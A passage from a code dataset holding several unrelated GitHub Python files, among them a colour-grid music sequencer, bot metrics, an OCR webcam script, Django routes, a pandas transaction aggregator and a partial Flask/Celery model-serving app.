cv2.rectangle(imagem,pt1=(x,y),pt2=(x+comprimento,y+altura),color=(240,250,70),thickness=2)\n #putText(imagem,(\"VERMELHO: Linha: \"+str(coordy+1)+\", Coluna: \"+str(coordx+1)),(20,30),color=(0,0,255),fontFace=FONT_HERSHEY_SIMPLEX,fontScale=1,thickness=4)\n #print(cor+\" - Linha: \"+str(coordy+1)+\", Coluna: \"+str(coordx+1))\n matriz[coordy][coordx]=cor\n #envio(matriz)\n\n # if atualizaLdeDic(matriz,lDic):\n # print(\"LALALALA\")\n # print(matriz)\n\n\n\n #desenhando tabuleiro\n i=0\n x1=50\n y1=50\n\n while i', time.time())\n\n\n#t1 = threading.Thread(target=roda_camera, args=('t1', 1))\nt1 = threading.Thread(target=roda_camera, args=())\n\nt1.start()\n#Abrindo o json\n\nwith open(\"Dadosescolhidos.json\", \"r\") as arquivo:\n data = json.load(arquivo)\n print(data)\n print(data['instrumentos']['box 1'])\n\n#MIXER\n\npygame.mixer.init(44100,-16,3,10)\npygame.mixer.set_num_channels(32)\n\n\n#AUDIOS\n\n#TROMPETE\n\ntdo=pygame.mixer.Sound(file='trom_Do.wav')\ntre=pygame.mixer.Sound(file='trom_Re.wav')\ntmi=pygame.mixer.Sound(file='trom_Mi.wav')\ntfa=pygame.mixer.Sound(file='trom_Fa.wav')\ntsol=pygame.mixer.Sound(file='trom_Sol.wav')\ntla=pygame.mixer.Sound(file='trom_La.wav')\ntsi=pygame.mixer.Sound(file='trom_Si.wav')\n\ntrompete={\"Dó\":tdo,\"Ré\":tre,\"Mi\":tmi,\"Fa\":tfa,\"Sol\":tsol,\"La\":tla,\"Si\":tsi}\n\n#DRUMS\n\nsnare=pygame.mixer.Sound(file='snare.wav')\nkick=pygame.mixer.Sound(file='kick.wav')\nhihat=pygame.mixer.Sound(file='hi-hat.wav')\nclap=pygame.mixer.Sound(file='clap.wav')\nsino=pygame.mixer.Sound(file='sino.wav')\nmoresnare=pygame.mixer.Sound(file='moresnare.wav')\ntriangulo=moresnare=pygame.mixer.Sound(file='triangulo.wav')\n\ndrums={\"Dó\":snare,\"Ré\":kick,\"Mi\":hihat,\"Fa\":clap,\"Sol\":sino,\"La\":moresnare,\"Si\":triangulo}\n\n#BAIXO\n\nsoundb1=pygame.mixer.Sound(file='baixo1.wav')\nb1raw_array_ = soundb1.get_raw()\nsoundb2=pygame.mixer.Sound(file='baixo2.wav')\nb2raw_array_ = soundb2.get_raw()\nsoundb3=pygame.mixer.Sound(file='baixo3.wav')\nb3raw_array_ = soundb3.get_raw()\n\nbaixo={\"Dó\":b1raw_array_[6350000:6500000],\n \"Ré\":b2raw_array_[6350000:6500000],\n \"Mi\":b3raw_array_[9350000:9500000],\n \"Fa\":b1raw_array_[9600000:9750000],\n \"Sol\":b2raw_array_[9600000:9750000],\n \"La\":b2raw_array_[4350000:4500000],\n \"Si\":b3raw_array_[6350000:6500000]}\n\n\n\n#VIOLÃO\n\nsoundv1=pygame.mixer.Sound(file='viola1.wav')\nv1raw_array_ = soundv1.get_raw()\nsoundv2=pygame.mixer.Sound(file='viola2.wav')\nv2raw_array_ = soundv2.get_raw()\nsoundv3=pygame.mixer.Sound(file='viola3.wav')\nv3raw_array_ = soundv3.get_raw()\n\nviola={\"Dó\":v1raw_array_[6420000:6570000],\n \"Ré\":v3raw_array_[6270000:6420000],\n \"Mi\":v2raw_array_[6250000:6400000],\n \"Fa\":v1raw_array_[9600000:9750000],\n \"Sol\":v3raw_array_[9400000:9550000],\n \"La\":v1raw_array_[13420000:13570000],\n \"Si\":v2raw_array_[13420000:13570000]}\n\n# PIANO\n\nsoundp = pygame.mixer.Sound(file='escalamaior.wav')\npraw_array_ = soundp.get_raw()\npiano = {\"Dó\":praw_array_[100000:250000],\n \"Ré\":praw_array_[300000:450000],\n \"Mi\":praw_array_[450000:600000],\n \"Fa\":praw_array_[620000:770000],\n \"Sol\":praw_array_[800000:950000],\n \"La\":praw_array_[1000000:1150000],\n \"Si\":praw_array_[1150000:1300000]}\n\n\n\n#Interface coding\n\n#INSTRUMENTS\njanela = tk.Tk()\njanela.title(\"Projeto de Gridi\")\njanela.geometry(\"800x800\")\n\nescolha1 = tk.Label(janela, text=\"Escolha o instrumento:\")\nescolha1.place(x=20, y=5)\n\ninstrumento1 = tk.StringVar(value= data[\"instrumentos\"][\"box 
1\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento1, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=55)\n\ninstrumento2 = tk.StringVar(value= data[\"instrumentos\"][\"box 2\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento2, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=105)\n\ninstrumento3 = tk.StringVar(value= data[\"instrumentos\"][\"box 3\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento3, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=155)\n\ninstrumento4 = tk.StringVar(value= data[\"instrumentos\"][\"box 4\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento4, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=205)\n\ninstrumento5 = tk.StringVar(value= data[\"instrumentos\"][\"box 5\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento5, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=255)\n\nescolha2 = tk.Label(janela, text=\"Associe uma nota a cada cor!\")\nescolha2.place(x=300, y=5)\n\n\n#COLORS AND TONES\n\n#Vermelho\n\nvermelho = tk.Label(janela, bg = \"red\", text=\" \",)\nvermelho.place(x=300, y=55)\n\nnota = tk.StringVar(value= data[\"cores\"][\"Vermelho\"]) \ncampo_nota = tk.OptionMenu(janela, nota, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota.config(width=10)\ncampo_nota.place(x=350, y=55)\n\n#Azul\n\nazul = tk.Label(janela, bg = \"blue\", text=\" \",)\nazul.place(x=300, y=105)\n\nnota2 = tk.StringVar(value= data[\"cores\"][\"Azul\"]) \ncampo_nota2 = tk.OptionMenu(janela, nota2, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota2.config(width=10)\ncampo_nota2.place(x=350, y=105)\n\n#Roxo\n\nroxo = tk.Label(janela, bg = \"purple\", text=\" \",)\nroxo.place(x=300, y=155)\n\nnota3 = tk.StringVar(value= data[\"cores\"][\"Roxo\"]) \ncampo_nota3 = tk.OptionMenu(janela, nota3, \"(selecione)\",\"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota3.config(width=10)\ncampo_nota3.place(x=350, y=155)\n\n#Verde\n\nverde = tk.Label(janela, bg = \"green\", text=\" \",)\nverde.place(x=300, y=205)\n\nnota4 = tk.StringVar(value= data[\"cores\"][\"Verde\"]) \ncampo_nota4 = tk.OptionMenu(janela, nota4, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota4.config(width=10)\ncampo_nota4.place(x=350, y=205)\n\n#Amarelo\n\namarelo = tk.Label(janela, bg = \"yellow\", text=\" \",)\namarelo.place(x=300, y=255)\n\nnota5 = tk.StringVar(value= data[\"cores\"][\"Amarelo\"]) \ncampo_nota5 = tk.OptionMenu(janela, nota5, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota5.config(width=10)\ncampo_nota5.place(x=350, y=255)\n\n#Rosa\n\nrosa = tk.Label(janela, bg = \"pink\", text=\" \")\nrosa.place(x=300, y= 305)\n\nnota6 = tk.StringVar(value= data[\"cores\"][\"Rosa\"]) \ncampo_nota6 = tk.OptionMenu(janela, nota6, \"(selecione)\",\"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota6.config(width=10)\ncampo_nota6.place(x=350, y=305)\n\n#Preto\n\npreto = tk.Label(janela, bg = \"black\", text=\" 
\")\npreto.place(x= 300, y= 355)\n\nnota7 = tk.StringVar(value= data[\"cores\"][\"Preto\"]) \ncampo_nota7 = tk.OptionMenu(janela, nota7, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota7.config(width=10)\ncampo_nota7.place(x=350, y=355)\n\n#LISTAS\ninstrumentos = [instrumento1, instrumento2, instrumento3, instrumento4, instrumento5]\nnotas = {\"Vermelho\": nota, \"Azul\": nota2, \"Roxo\": nota3, \"Verde\": nota4, \"Amarelo\": nota5, \"Rosa\": nota6, \"Preto\": nota7}\n#notas = data[cores].get()\n\n#Botoes Velocidade\ndef velocidadeatual(novovalor):\n global vel\n vel = float(novovalor)\n\n\nglobal vel\nvel = 0.2\nvelocidade = tk.DoubleVar(value = data[\"Velocidades\"][\"Velocidade\"])\nvel = velocidade.get()\nscale = tk.Scale(janela, from_=0.2, to=1, resolution=0.2, command = velocidadeatual)\nscale.place(x=550, y=80)\nl1 = tk.Label(janela, text= \"Velocidade:\")\nl1.place(x=550, y= 50)\n\n\n\n\n#Desenho com matriz\n'''\ngridi = tk.Canvas(janela, bg=\"blue\", height=600, width=200)\ncoord = 10, 50, 240, 210\noval = gridi.create_polygon(200, 600, 700, 600, 700, 900, 200, 900)\n'''\n\n\n\n#SAVING CHOSEN DATA\n\ndef salvar_dados():\n print(\"\\n*** Escolhas selecionadas pelo usuário.***\")\n print(\"Nota p/ vermelho:\", nota.get())\n print(\"Nota p/ azul:\", nota2.get())\n print(\"Nota p/ roxo:\", nota3.get())\n print(\"Nota p/ verde:\", nota4.get())\n print(\"Nota p/ amarelo:\", nota5.get())\n print(\"Nota p/ rosa:\", nota6.get())\n print(\"Nota p/ preto:\", nota7.get())\n\n json_dados={\n\n \"instrumentos\": {\n \"box 1\": instrumento1.get(), \"box 2\" : instrumento2.get(), \"box 3\": instrumento3.get(), \"box 4\": instrumento4.get(), \"box 5\": instrumento5.get(),\n },\n \"cores\":\n {\n \"Vermelho\": nota.get(), \"Azul\": nota2.get(), \"Roxo\" : nota3.get(), \"Verde\": nota4.get(), \"Amarelo\": nota5.get(), \"Rosa\": nota6.get(),\"Preto\":nota7.get()\n },\n \"Velocidades\":\n {\n \"Velocidade\": vel#.get()\n }\n }\n\n with open(\"Dadosescolhidos.json\", \"w\") as arquivo:\n json.dump(json_dados, arquivo) \n\nbotao_dados = tk.Button(janela, text=\"Salvar Dados\", command=salvar_dados)\nbotao_dados.place(x=550, y=205)\n\n#GLOBAIS\n\nglobal cont\ncont=0\n\nglobal timer\ntimer = None\n\nglobal bpm\nbpm= 0.35\n\nglobal envio_sons_finais\nenvio_sons_finais = []\n\n\n#Envio JSON\n\ndef escolhas_definidas():\n global envio_sons_finais\n envio_sons_finais=[]\n\n for i in range(0,len(matriz)):\n cores_na_linha = matriz[i]\n lista_de_notas = []\n\n for cor in cores_na_linha:\n if cor != None:\n lista_de_notas.append(notas[cor].get())\n else:\n lista_de_notas.append(None)\n\n\n dicionario = {\n \"instrumento\": instrumentos[i].get(),\n \"notas\": lista_de_notas\n }\n\n envio_sons_finais.append(dicionario)\n\n print(envio_sons_finais)\n return \n\n\n#Botao Envio\n\nbotao_escolhas = tk.Button(janela, text=\"Enviar dados\", command=escolhas_definidas)\nbotao_escolhas.place(x=550, y=260)\n\ns_biblioteca={\"Trompete\":trompete,\"Bateria\":drums,\"Baixo\":baixo,\"Violão\":viola,\"Piano\":piano}\n\n\n#PLAY\ndef play():\n global envio_sons_finais\n global cont\n\n if cont >= 8:\n cont=0\n\n for i in range(len(envio_sons_finais)):\n dicionario=envio_sons_finais[i]\n\n if dicionario[\"instrumento\"] != \"(selecione)\":\n\n s_som=s_biblioteca[dicionario[\"instrumento\"]]\n if dicionario[\"notas\"][cont]:\n\n recurso_de_nota=s_som[dicionario[\"notas\"][cont]]\n\n if isinstance(recurso_de_nota,pygame.mixer.Sound) == True:\n toca_inst=s_som[dicionario[\"notas\"][cont]]\n 
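                        # `s_som` maps notes to two kinds of values: ready-made
                        # pygame Sound objects (trompete, drums) and raw PCM byte
                        # slices (baixo, viola, piano). A Sound plays directly;
                        # the else branch below first wraps a raw slice, e.g.
                        # pygame.mixer.Sound(buffer=piano[\"Dó\"]).play()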
toca_inst.play()\n else:\n nota=s_som[dicionario[\"notas\"][cont]]\n toca_inst=pygame.mixer.Sound(buffer=nota)\n toca_inst.play()\n cont+=1\n\n global timer \n timer= Timer(vel, play)\n timer.start()\n\n\n\n# Carolina converteu a matriz de cores para uma estrura como essa abaixo\n\n# [\n# {'instrumento': 'Piano', 'notas': ['Dó', None, 'Fá', None, None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': [None, 'Si', None, None, None, None, None, None]},\n# {'instrumento': 'Baixo', 'notas': [None, None, 'Ré', None, None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': [None, None, None, '(selecione)', None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': ['Fá', '(selecione)', None, None, None, None, None, None]}\n# ]\n\n#Botao Play\nbotaoplay = tk.Button(janela, text=\"PLAY\", command= play)\nbotaoplay.place(x=640, y=305)\n\n\n#STOP\n\n\ndef stop():\n global timer\n if timer != None:\n timer.cancel()\n timer=None\n\n# Botao Pausa\nbotaostop = tk.Button(janela, text=\"STOP\", command= stop)\nbotaostop.place(x=560, y=305)\n\n# #Execução\n# cores_detectadas = [\n# [\"Vermelho\",None,\"Azul\",None,None,None,None,None],\n# [None,\"Vermelho\",None,None,None,None,None,None],\n# [None,None,\"Vermelho\",None,None,None,None,None],\n# [None,None,None,\"Vermelho\",None,None,None,None],\n# [\"Vermelho\",\"Vermelho\",None,None,None,None,None,None],\n# ]\n\n\n# Canvas\ngrade = tk.Label(janela, text=\"Grade Virtual:\")\ngrade.place(x=20, y=480)\n\nmyCanvas = tk.Canvas(janela, bg=\"white\", height=500, width=500)\n\nmyCanvas.place(x=20, y=500)\n\ndef carol():\n print(\"carol\")\n for i in range(len(matriz)):\n for j in range(len(matriz[0])):\n x = j * 30 + 30\n y = i * 30 +30\n if matriz[i][j] == \"Vermelho\":\n cor = \"red\"\n elif matriz[i][j] == \"Verde\":\n cor = \"green\"\n elif matriz[i][j] == \"Azul\":\n cor = \"blue\"\n elif matriz[i][j] == \"Roxo\":\n cor = \"purple\"\n elif matriz[i][j] == \"Laranja\":\n cor = \"orange\"\n elif matriz[i][j] == \"Rosa\":\n cor = \"pink\"\n elif matriz[i][j] == \"Preto\":\n cor = \"black\"\n elif matriz[i][j] == None:\n cor = \"white\"\n\n\n myCanvas.create_oval(x,y,x+10,y+10, fill = cor)\n \n janela.after(100, carol)\n\ncarol()\n\n'''\nmyCanvas = tk.Canvas(janela, bg=\"white\", height=100, width=100)\ncoord = 20, 20, 50, 50\nbola = myCanvas.create_oval(coord, start=0, extent=359, fill=\"pink\")\n\nmyCanvas.place(x=20, y=500)\njanela.mainloop()\n'''\n","repo_name":"mmagagnin/trab-final-micro","sub_path":"ENTREGA FINAL/FINAL FINAL MESMO PARA ENTREGAR.py","file_name":"FINAL FINAL MESMO PARA ENTREGAR.py","file_ext":"py","file_size_in_byte":18975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22308050272","text":"from prometheus_client import Counter, Gauge, Histogram, Info, Summary\n\nBUCKETS = (1, 1.5, 3, 5, 10, 30, 1 * 60, 2 * 60, 5 * 60, 10 * 60, 15 * 60, float(\"inf\"))\nslash_labels = [\n \"base_name\",\n \"group_name\",\n \"command_name\",\n \"command_id\",\n \"guild_id\",\n \"guild_name\",\n \"dm\",\n \"user_id\",\n]\n\n# nafftrack stats\nlib_info = Info(\"naff\", \"Basic info about naff library\")\nbot_info = Info(\"naff_bot\", \"Basic attributes of the running bot\")\nlatency_gauge = Gauge(\"naff_bot_latency\", \"Latency of the websocket connection\")\n\ncache_gauge = Gauge(\"naff_cache_count\", \"Amount of objects in internal caches\", labelnames=[\"name\"])\ncache_limits_soft = Gauge(\"naff_cache_soft_limits\", \"Soft limits on the caches\", 
labelnames=[\"name\"])\ncache_limits_hard = Gauge(\"naff_cache_hard_limits\", \"Hard limits on the caches\", labelnames=[\"name\"])\n\n\nmessages_counter = Counter(\n \"naff_received_messages\",\n \"Amount of received messages\",\n labelnames=[\"guild_id\", \"guild_name\", \"channel_id\", \"channel_name\", \"dm\", \"user_id\"],\n)\n\nguilds_gauge = Gauge(\"naff_guilds\", \"Amount of guilds this bot is in\")\nchannels_gauge = Gauge(\"naff_channels\", \"Amount of channels this bot is in\", labelnames=[\"guild_id\", \"guild_name\"])\nmembers_gauge = Gauge(\"naff_members\", \"Amount of members this bot can see\", labelnames=[\"guild_id\", \"guild_name\"])\n\ninteractions_sync = Summary(\"naff_interactions_sync\", \"Amount of syncs and time spent syncing interactions\")\n\nslash_commands_perf = Histogram(\n \"naff_slash_command_perf\",\n \"Amount of calls and the time of execution of the command\",\n labelnames=slash_labels,\n buckets=BUCKETS,\n)\n\nslash_commands_running = Gauge(\n \"naff_slash_command_running\",\n \"Amount of concurrently running slash command callbacks\",\n labelnames=slash_labels,\n)\n\nslash_command_errors = Counter(\n \"naff_slash_command_errors\",\n \"Amount of errors experienced in the bot\",\n labelnames=slash_labels,\n)\n\n# own stats\nelevator_version_info = Info(\"elevator_version\", \"Version of Elevator\")\n\nstart_time_info = Info(\"naff_bot_start_time\", \"Start Time\")\n\ninteractions_registered_global = Gauge(\n \"naff_global_interactions_registered\", \"Amount of globally registered application commands\"\n)\ninteractions_registered_descend = Gauge(\n \"naff_descend_interactions_registered\", \"Amount of descend only registered application commands\"\n)\n\ndescend_voice_channel_activity = Histogram(\n \"naff_descend_voice_channel_activity\",\n \"How long users are in voice channels\",\n labelnames=[\"channel_id\", \"channel_name\", \"user_id\"],\n buckets=BUCKETS,\n)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/prometheus/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"71504767209","text":"import new_models.server_handler as sh\nimport time\nfrom models.User import User\n\nserver_handler = sh.ServerHandler(client_type=\"user\")\n\nmes = (\"start_remote_control\", \"test_plant\")\nprint(server_handler.send_and_receive(mes))\n\n\n\"\"\"\n {\n \"display_text\": self.set_text_display,\n \"led_ring\": self.set_led_ring,\n \"get_moisture\": self.get_moisture,\n \"get_light_level\": self.get_light_level,\n \"add_water\": self.add_water,\n }\n\"\"\"\n\n\np = \"A\"\nwhile True:\n\n ac = input(\"1=turn pump | 2=get light lvls | 3=turn led ring: \")\n\n if ac == \"1\":\n m = input(\">> Duration: \")\n mes = (\"remote_action\", (\"add_water\", (p, m))) # (type of action, (details))\n print(server_handler.send_and_receive(mes))\n elif ac == \"2\":\n mes = (\"remote_action\", (\"get_light_level\", (p))) # (type of action, (details))\n print(server_handler.send_and_receive(mes, data_rec=True))\n\n elif ac == \"3\":\n m = input(\">> 1=on | 2=off: \")\n mes = (\"remote_action\", (\"led_ring\", (p, True if m == \"1\" else False))) # (type of action, (details))\n print(server_handler.send_and_receive(mes))\n\n\n elif ac == \"4\":\n u = User(\"a\", \"doron\", \"pas\", \"emal\", \"admin\", [], True)\n mes = (\"sign_up_user\", u)\n server_handler.send_and_receive(mes, False)\n server_handler.set_id(u)\n\n\n\n time.sleep(2)\n 
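    # Every exchange above uses the same wire shape: a (message_type, payload)
    # tuple, where a remote action's payload is (action_name, arguments). Going by
    # the handler mapping in the docstring, a moisture read would presumably be
    # (\"remote_action\", (\"get_moisture\", (p))); replies that carry data are
    # fetched with data_rec=True.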
print(\"\")\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/_OLD/user_dir/user_loop.py","file_name":"user_loop.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31192402043","text":"import cv2\nimport pytesseract\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FPS, 24)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 600)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nwhile True:\n ret, img = cap.read()\n cv2.imshow(\"camera\", img)\n if cv2.waitKey(10) == 27: # Клавиша Esc\n break\n str=pytesseract.image_to_string(img, lang='rus')\n if str:\n print(str)\n s=input('найден текст! Продолжить(1)')\n if s=='1':\n foud = input(\"Что найти? \")\n data = pytesseract.image_to_data(img, lang='rus')\n for i, el in enumerate(data.splitlines()):\n if i == 0:\n continue\n el = el.split()\n try:\n if (el[11] == foud):\n print(el[11])\n try:\n x, y, w, h = int(el[6]), int(el[7]), int(el[8]), int(el[9])\n cv2.rectangle(img, (x, y), (w + x, h + y), (0, 0, 255), 1)\n except IndexError:\n continue\n except IndexError:\n continue\n\n cv2.imshow('Result', img)\n cv2.waitKey(0)\n\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n","repo_name":"Fyrazhka/Find-word-in-text","sub_path":"WebCamFind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19468545412","text":"from django.urls import path\nfrom . import views\n\n# urlpatterns=[\n# path(\"\",views.index,name=\"all-meetups\"),\n# path(\"/success\",views.confirm_registration,name=\"confirm-registration\"),\n# path(\"\",views.meetup_details,name=\"meetup-detail\")\n \n# ]\n\nurlpatterns = [\n path(\"reviews/\",views.index_page,name=\"index_page\"),\n path(\"reviews/post_review_page\",views.post_review_page,name=\"post_review_page\"),\n path(\"reviews/submit_post/\",views.submit_post,name=\"submit_post\"),\n path(\"reviews/single_course_review_page/\",views.single_course_review_page,name=\"single_course_review_page\"),\n path(\"reviews/review_of_single_course\",views.review_of_single_course,name=\"review_of_single_course\")\n]\n","repo_name":"amarbudhiraja/IIT-Bhilai-Course-Review","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30163162372","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport json\nimport glob\nfrom tqdm import tqdm\nimport natsort\nimport os\nimport logging\n\n# define logging configurations\nlogging.basicConfig(level = logging.DEBUG,\n format = '%(asctime)s:%(levelname)s:%(name)s:%(message)s')\n\ndef get_params() -> dict:\n parser = argparse.ArgumentParser(description='DataTest')\n parser.add_argument('--customers_location', required=False, default=\"./input_data/starter/customers.csv\")\n parser.add_argument('--products_location', required=False, default=\"./input_data/starter/products.csv\")\n parser.add_argument('--transactions_location', required=False, default=\"./input_data/starter/transactions/\")\n parser.add_argument('--output_location', required=False, default=\"./output_data/outputs/\")\n return vars(parser.parse_args())\n\ndef process_data(customers_location:str, products_location:str, transactions_location:str, output_location:str) -> None:\n # read the different data files\n products = pd.read_csv(products_location)\n customers 
= pd.read_csv(customers_location)\n transaction_files = glob.glob(os.path.join(transactions_location, \"*/transactions.json\"))\n\n logging.info(\"There are {} products, {} customers and {} transaction files\".format(products.shape[0], customers.shape[0], len(transaction_files)))\n\n # read and append to a list the dictionary of all transactions across different dates\n all_transactions = []\n for a_file in tqdm(transaction_files):\n one_file_data = open(a_file).read().split(\"\\n\")\n for trans in one_file_data:\n # in case the one_file_data is empty, pass\n try:\n trans_obj = json.loads(trans)\n all_transactions.append(trans_obj)\n except Exception as e:\n pass\n\n # convert the dictionary of transactions at customer level into a list of transactions at customer cross product level\n transactions_at_product_level = []\n for transaction in tqdm(all_transactions):\n customer_id = transaction['customer_id']\n date_of_purchase = transaction['date_of_purchase']\n for item in transaction['basket']:\n product_id = item['product_id']\n price = item['price']\n transactions_at_product_level.append([date_of_purchase, customer_id, product_id, price])\n\n # convert list of transactions into a pandas dataframe for easier processing\n transactions_at_product_level = pd.DataFrame(transactions_at_product_level, columns=['date_of_purchase', 'customer_id', 'product_id', 'price'])\n\n # get a count of transactions at user cross product level, sort first by customer_id and then product_id\n transactions_grouped_by_customer_id_and_product_id = transactions_at_product_level.groupby(['customer_id', 'product_id']).agg(purchase_count=('price', 'count')).reset_index().sort_values(by=[\"customer_id\", \"product_id\"], key=natsort.natsort_keygen())\n\n # make a left join with customers to get loyalty score\n transactions_grouped_by_customer_id_and_product_id_with_loyalty_score = transactions_grouped_by_customer_id_and_product_id.merge(customers, on='customer_id', how='left')\n\n # make a left join with products to get product category\n transactions_grouped_by_customer_id_and_product_id_with_loyalty_score_with_category = transactions_grouped_by_customer_id_and_product_id_with_loyalty_score.merge(products, on='product_id', how='left')\n final_results = transactions_grouped_by_customer_id_and_product_id_with_loyalty_score_with_category[['customer_id', 'loyalty_score', 'product_id', 'product_category', 'purchase_count']]\n\n # if output directory does not exist, create it\n if not os.path.isdir(output_location):\n os.makedirs(output_location)\n dest_path = os.path.join(output_location, \"final.csv\")\n\n # write the dataframe to the destination as a csv file\n final_results.to_csv(dest_path, index=None)\n\ndef main():\n # get command line arguments \n params = get_params()\n\n # call custom function to process data\n process_data(params['customers_location'], params['products_location'], params['transactions_location'], params['output_location'])\n\nif __name__ == \"__main__\":\n main()\n\n# go to root folder (you should be able to see the solutions folder from the root folder)\n# run following command to generate the output, provide command line arguments if necessary\n# python solutions/custom_solution.py --customers_location ./starter/customers.csv --products_location ./starter/products.csv --transactions_location ./starter/transactions --output_location ./output_data/outputs/","repo_name":"adiosboy/Revolve_assignment","sub_path":"python-assignment-level2-6ed53b4e828af18bc24b1770a3a3e3e70706e785/solution/custom 
solution.py","file_name":"custom solution.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32699235192","text":"import random\nimport sys\n\nfrom PyQt5.QtGui import QPainter, QPen, QColor\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton\n\n\nclass FlagMaker(QMainWindow):\n def __init__(self):\n super().__init__()\n f = open(\"UI.ui\")\n self.generate = QPushButton(self)\n self.generate.setGeometry(400, 800, 100, 50)\n self.generate.setText(\"Generate\")\n self.setGeometry(0, 0, 1900, 1000)\n self.flag = False\n self.generate.clicked.connect(self.generateListener)\n\n def paintEvent(self, event):\n if self.flag:\n painter = QPainter(self)\n painter.setPen(QPen(QColor(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), 10))\n rand = random.randint(50, 1000)\n painter.drawEllipse(100, 40, rand, rand)\n self.flag = False\n\n def generateListener(self):\n self.flag = True\n self.update()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = FlagMaker()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"userAndrew2023/pluh-pluh","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69973391207","text":"import matplotlib.pyplot as plt\nimport matplotlib\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] = False\nlabel_list = [\"第一部分\", \"第二部分\", \"第三部分\", \"第四部分\"] # 各部分标签\nsize = [35, 25, 10,20] # 各部分大小\ncolor = [\"red\", \"green\", \"blue\",'yellow'] # 各部分颜色\nexplode = [0.05, 0, 0,0.02] # 各部分突出值\n\"\"\"\n绘制饼图\nexplode:设置各部分突出\nlabel:设置各部分标签\nlabeldistance:设置标签文本距圆心位置,1.1表示1.1倍半径\nautopct:设置圆里面文本\nshadow:设置是否有阴影\nstartangle:起始角度,默认从0开始逆时针转\npctdistance:设置圆内文本距圆心距离\n返回值\nl_text:圆内部文本,matplotlib.text.Text object\np_text:圆外部文本\n\"\"\"\npatches, l_text, p_text = plt.pie(size, explode=explode, colors=color, labels=label_list, labeldistance=1.1, autopct=\"%1.1f%%\", shadow=False, startangle=90, pctdistance=0.6)\nplt.axis(\"equal\") # 设置横轴和纵轴大小相等,这样饼才是圆的\nplt.legend()\nplt.show()\n","repo_name":"yzwgithub/TeachPython","sub_path":"AI/AI基础/class_23/class_23_01.py","file_name":"class_23_01.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72613775528","text":"import logging\nimport json\n\nimport numpy as np\nfrom PIL import Image\nfrom flask import Flask, request, abort, send_from_directory\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO\n\nfrom celery_queue import app, redis_instance\nimport config\nfrom tasks import predict_vgg16, predict_mobilenet, predict_review_sentiment, \\\n predict_deeplab, predict_inception, predict_ssd_inception\n\ni = app.control.inspect()\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__package__)\nlogging.getLogger('engineio').setLevel(logging.ERROR)\nlogging.getLogger('socketio').setLevel(logging.ERROR)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\n\nflask_app = Flask(__name__)\nsocketio = SocketIO(flask_app)\nCORS(flask_app)\n\ndef handle_image(request):\n if 'file' not in request.files:\n abort(400, config.ERROR_NO_IMAGE)\n\n file = request.files['file']\n 